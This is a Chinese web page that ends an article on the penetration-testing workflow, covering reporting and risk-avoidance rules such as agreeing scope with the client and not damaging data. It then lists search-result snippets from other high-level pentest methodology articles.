    • 整理漏洞信息:整理渗透过程中遇到的各种漏洞,各种脆弱位置信息

    目的:为了最后形成报告,形成测试结果使用。

    9.形成报告

    • 按需整理:按照之前第一步跟客户确定好的范围,需求来整理资料,并将资料形成报告
    • 补充介绍:要对漏洞成因,验证过程和带来危害进行分析
    • 修补建议:当然要对所有产生的问题提出合理高效安全的解决办法

    风险规避

    1. 不要进行诸如ddos攻击,不破坏数据;
    2. 测试之前对重要数据进行备份;
    3. 任何测试执行前必须和客户进行沟通,以免引来不必要的麻烦;
    4. 可以对原始系统生成镜像环境,然后对镜像环境进行测试;
    5. 明确渗透测试范围;
    展开全文
  • 渗透流程 前期与客户的交流阶段   在前期与客户的交流阶段中,渗透测试人员需要与客户进行商讨来确定整个渗透测试的范围,就是说针对目标的那些设备和那些问题进行测试。在整个商讨过程中要考虑的因素...渗透测试过程
  • 谈一谈渗透测试流程

    2021-02-24 14:31:49
    本文根据作者的渗透测试经验,讲讲基本的渗透测试流程,分享给大家。当拿到一个合法的渗透测试项目时,我们首先应该明确客户要求我们进行渗透测试的范围以及整体项目的时间。比如说,给我们的域名有哪些,ip段有哪些...
  • 渗透测试流程

    2020-06-12 15:38:22
    PTES渗透测试执行标准 前期交互阶段 一、确定范围 <1>如何确定范围 1、时间估计 a 预估整体项目的时间周期 b 确定以小时计的额外技术支持 2、问答交谈 a 对业务管理部门的问答交流 b 对系统管理员的问答交流 c...
  • 渗透测试PTES标准流程(超详细)

    千次阅读 2021-04-12 09:16:43
    渗透测试的基本流程一、什么是渗透测试?二、渗透测试的阶段过程 一、什么是渗透测试渗透测试就是利用学习掌握的技能通过一种模拟攻击的技术与方法,挫败目标系统的安全控制策略并获得控制访问权的安全测试方法,...
  • 渗透测试流程——渗透测试的9个步骤(转)

    万次阅读 多人点赞 2019-05-09 20:24:58
    渗透测试流程: 1.明确目标 2.分析风险,获得授权 3.信息收集 4.漏洞探测(手动&自动) 5.漏洞验证 6.信息分析 7.利用漏洞,获取数据 8.信息整理 9.形成报告 1.明确目标 1)确定范围:测试的范围,如:IP...
  • WEB渗透测试流程

    2018-09-17 23:06:49
    WEB渗透测试流程
  • 一次完整的渗透测试流程 目录 渗透测试 信息收集 漏洞探测 漏洞利用 内网转发 内网渗透 痕迹清除 撰写渗透测试保告 渗透测试 渗透测试就是利用我们所掌握的渗透知识,对一个网站进行一步一步的渗透,...
  • 完整渗透测试过程讲解
  • Web渗透测试流程研究

    2021-01-29 15:10:42
    随着Web技术的广泛应用,Web技术使人们生活发生了根本转变,然而Web安全也面临着前所未有的挑战,Web渗透...为提高Web渗透测试的成功率,本文在Web渗透测试流程增加了信息收集阶段,并给出了信息收集阶段的功能定义。
  • 本文的是在学习过程中,整理出来的选择题,基本涵盖渗透测试方面的小知识点,既可以作为面试题,同时可以自我查缺补漏的知识梳理。
  • 渗透测试这个事情不是随便拿个...渗透测试流程 渗透测试与入侵的最大区别 渗透测试:出于保护系统的目的,更全面地找出测试对象的安全隐患。入侵:不择手段地(甚至是具有破坏性的)拿到系统权限。一般渗透测试流...
  • 渗透测试流程

    2020-03-10 10:16:10
    一、PTES标准渗透测试流程 1 PTES:前期交互阶段 前期交互阶段通常是与客户组织进行讨论,来确定渗透测试的范围和目标。这个阶段最为关键的是需要让客户组织明确清晰地了解渗透测试将涉及哪些目标。选择更加现实...
  • 网银渗透测试流程

    2018-07-12 15:35:40
    此文档是针对银行等金融行业渗透测试所做的渗透测试漏洞挖掘流程与方法!非常有用,尤其是以从业的安全人士、黑客等

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 32,214
精华内容 12,885
关键字:

渗透测试流程